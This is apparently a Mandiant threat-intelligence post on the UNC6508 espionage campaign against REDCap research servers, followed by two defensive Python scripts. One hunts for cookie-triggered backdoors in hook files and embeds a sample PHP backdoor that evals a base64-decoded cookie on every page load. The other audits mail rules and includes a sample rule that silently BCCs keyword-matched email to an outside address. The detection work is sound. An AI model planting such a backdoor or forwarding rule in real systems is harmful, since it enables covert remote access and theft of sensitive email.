Post by Mandiant (part of Google Cloud)

🚨 Sophisticated espionage campaign attributed to UNC6508, a PRC-nexus threat actor. The campaign targets the North American academic, medical, and military research community. The threat actor compromised externally facing web applications and remained undetected for over a year, exfiltrating sensitive defense and medical intelligence. UNC6508 consistently targets REDCap (Research Electronic Data Capture) servers, using a custom malware payload tracked as INFINITERED.

The attack lifecycle demonstrates advanced operational capabilities:

• Intercepting the REDCap upgrade process to inject malicious code and maintain persistent remote access.
• Harvesting credentials submitted via POST requests and hiding them, encrypted, inside legitimate local database tables.
• Establishing a global hook backdoor that executes on every page load and communicates via specific HTTP Cookie parameters.
• Employing Obfuscation (OBF) networks, including compromised routers and residential proxies, to conceal malicious traffic.

🛠️ Novel Technique

Following internal reconnaissance and privilege escalation to an enterprise administrator account, UNC6508 deployed a data exfiltration technique not previously observed from PRC-nexus actors. The threat actor manipulated domain content compliance rules, a legitimate feature in enterprise productivity suites, to create a malicious rule named "Patroit." This rule used regular expressions to silently BCC-forward emails matching strategic keywords related to military strategy, advanced technology, and specific medical research pathogens to an actor-controlled account.

📋 Defensive Recommendations

Defenders must prioritize the rapid application of security patches, the removal of legacy software to prevent downgrade attacks, and the enforcement of phishing-resistant 2-step verification for enterprise administrator accounts.

Read the full technical analysis, and get INFINITERED IOCs and YARA rules: 🔗 https://lnkd.in/eDC_SGPz
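The "global hook backdoor that executes on every page load, communicating via specific HTTP Cookie parameters" bullet above describes a pattern a defender can hunt for in a REDCap hook file: an every-page hook that reads a cookie and feeds it to a code-execution sink. The scanner below is an added example, not Mandiant's or REDCap's code. It assumes REDCap's hook function names redcap_every_page_before_render and redcap_every_page_top as the every-page entry points; the PHP it scans is a constructed sample, not INFINITERED, and the cookie name in it is made up.

```python
"""Scan a REDCap hook file for a cookie-triggered, page-load backdoor.

Added example (not Mandiant's or REDCap's code). Assumes REDCap's hook
function names redcap_every_page_before_render / redcap_every_page_top;
SAMPLE_HOOKS is a constructed hook file, not real malware.
"""
import re

# Hook functions REDCap invokes on every page load (assumed names).
EVERY_PAGE_HOOKS = {"redcap_every_page_before_render", "redcap_every_page_top"}

FUNC_DEF = re.compile(r"\bfunction\s+(\w+)\s*\(")
COOKIE_READ = re.compile(r"\$_COOKIE\s*\[\s*['\"]([^'\"]+)['\"]\s*\]")
EXEC_SINK = re.compile(
    r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open|create_function)\s*\("
)
DECODER = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(")


def php_functions(src):
    """Yield (name, body) for each top-level PHP function, splitting at the
    next 'function' keyword. Crude, but enough for a hook file."""
    defs = list(FUNC_DEF.finditer(src))
    for i, m in enumerate(defs):
        end = defs[i + 1].start() if i + 1 < len(defs) else len(src)
        yield m.group(1), src[m.start():end]


def scan_hook_file(src):
    """Return findings for functions that both read $_COOKIE and call a
    code-execution sink. Every-page hooks are rated high, others medium.
    Cookie names are reported because they are candidate network IOCs."""
    findings = []
    for name, body in php_functions(src):
        cookies = COOKIE_READ.findall(body)
        sinks = EXEC_SINK.findall(body)
        if not (cookies and sinks):
            continue
        findings.append({
            "function": name,
            "severity": "high" if name in EVERY_PAGE_HOOKS else "medium",
            "cookie_names": sorted(set(cookies)),
            "sinks": sorted(set(sinks)),
            "decoder": bool(DECODER.search(body)),
        })
    return findings


# Constructed sample hook file: a benign every-page hook that only reads a
# cookie, a normal save hook, and a backdoor-like hook that evals a cookie.
SAMPLE_HOOKS = r"""<?php
function redcap_every_page_top($project_id) {
    if (isset($_COOKIE['redcap_theme'])) { echo "<!-- themed -->"; }
}
function redcap_save_record($project_id, $record, $instrument) {
    // normal project logic
}
function redcap_every_page_before_render($project_id) {
    if (isset($_COOKIE['xsrf_tok'])) {
        eval(base64_decode($_COOKIE['xsrf_tok']));
    }
}
"""

if __name__ == "__main__":
    for finding in scan_hook_file(SAMPLE_HOOKS):
        print(finding)
```

Reading a cookie alone is not flagged (the theme hook above is silent); the combination of cookie input and an execution sink is what matters, and the every-page hooks get the higher severity because that is exactly where a backdoor gets a request on every page load. Run it against the hook file your REDCap instance is configured to load, and compare the file against a known-good copy as well, since a scanner like this only catches the obvious sinks.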
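The Novel Technique section describes a compliance rule that regex-matches message content and quietly BCCs matching mail to an outside account. The audit below is an added example, not Mandiant's code and not any vendor's export format: it assumes a constructed rule shape (name, match, actions) that a real rule export would have to be mapped onto, an assumed set of organization domains, and constructed sample rules, one of which reproduces the described behaviour under the name from the post.

```python
"""Audit exported mail compliance/routing rules for silent external forwarding.

Added example, not Mandiant's code and not a vendor's export schema. The
rule records use a constructed shape; ORG_DOMAINS and SAMPLE_RULES are
assumptions for illustration.
"""
import re

ORG_DOMAINS = {"example.edu", "research.example.edu"}   # assumed org domains

# Constructed sample export. The second rule mirrors the post: regex keyword
# match plus a BCC to a mailbox outside the organization.
SAMPLE_RULES = [
    {"name": "Block outbound SSNs",
     "match": {"type": "regex", "patterns": [r"\b\d{3}-\d{2}-\d{4}\b"]},
     "actions": {"reject": True, "add_recipients": []}},
    {"name": "Patroit",
     "match": {"type": "regex", "patterns": [r"(?i)\b(strategy|pathogen)\b"]},
     "actions": {"reject": False,
                 "add_recipients": [{"address": "collector@example.net", "bcc": True}]}},
    {"name": "Copy legal on contracts",
     "match": {"type": "keyword", "patterns": ["contract"]},
     "actions": {"reject": False,
                 "add_recipients": [{"address": "legal@example.edu", "bcc": False}]}},
]


def domain_of(address):
    return address.rsplit("@", 1)[-1].lower()


def audit_rules(rules, org_domains=ORG_DOMAINS):
    """Flag rules that add a recipient outside org_domains. Severity is high
    when the copy is a BCC (invisible to sender and recipients) and the match
    is a regex over content; a visible CC to an outside address is medium."""
    findings = []
    for rule in rules:
        external = [r for r in rule["actions"].get("add_recipients", [])
                    if domain_of(r["address"]) not in org_domains]
        if not external:
            continue
        silent = any(r.get("bcc", False) for r in external)
        regex = rule["match"].get("type") == "regex"
        findings.append({
            "rule": rule["name"],
            "external_recipients": sorted(r["address"] for r in external),
            "silent_bcc": silent,
            "regex_match": regex,
            "patterns": list(rule["match"].get("patterns", [])),
            "severity": "high" if (silent and regex) else "medium",
        })
    return findings


def would_forward(rule, text):
    """True if the rule's content match fires on text. Lets a reviewer test
    what a suspicious rule would actually have copied out."""
    kind = rule["match"].get("type")
    for pattern in rule["match"].get("patterns", []):
        if kind == "regex" and re.search(pattern, text):
            return True
        if kind == "keyword" and pattern.lower() in text.lower():
            return True
    return False


if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_RULES):
        print(finding)
    print(would_forward(SAMPLE_RULES[1], "Draft: pathogen containment protocol"))
```

The check keys on the recipient's domain rather than the rule's name, because the name is attacker-chosen and a near-miss spelling like "Patroit" is easy to skim past. Run an audit like this on a schedule and on every admin-console change event, and treat any rule that adds an external BCC as an incident until a named owner has confirmed it.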